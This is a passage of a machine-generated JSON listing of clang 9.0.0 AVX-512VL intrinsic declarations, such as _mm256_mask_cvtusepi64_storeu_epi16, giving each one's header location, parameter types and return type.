"variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtsepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7019:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtsepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7027:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtsepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7035:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtsepi32_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7043:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtsepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7049:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtsepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7057:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtsepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7064:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtsepi32_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7072:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtsepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7078:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtsepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7086:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtsepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7093:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtsepi64_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7101:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtsepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7107:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtsepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7115:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtsepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7122:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtsepi64_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7130:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtsepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7136:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtsepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7144:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtsepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7151:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtsepi64_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7159:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtsepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7165:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtsepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7173:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtsepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7181:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtsepi64_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7189:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtsepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7195:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtsepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7203:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtsepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7210:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtsepi64_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7218:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtsepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7224:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtsepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7232:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtsepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7239:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtsepi64_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7247:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtusepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7253:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtusepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7261:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtusepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7269:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtusepi32_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7277:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtusepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7283:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtusepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7291:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtusepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7299:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtusepi32_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7307:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtusepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7313:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtusepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7321:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtusepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7328:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtusepi32_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7336:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtusepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7342:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtusepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7350:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtusepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7357:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtusepi32_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7365:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtusepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7371:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtusepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7379:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtusepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7387:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtusepi64_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7395:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtusepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7401:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtusepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7409:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtusepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7417:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtusepi64_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7425:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtusepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7431:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtusepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7439:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtusepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7446:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtusepi64_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7454:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtusepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7460:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtusepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7468:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtusepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7475:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtusepi64_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7483:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtusepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7489:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtusepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7497:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtusepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7504:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtusepi64_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7512:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtusepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7518:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtusepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7526:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtusepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7533:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtusepi64_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7541:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7547:1", "variadic": 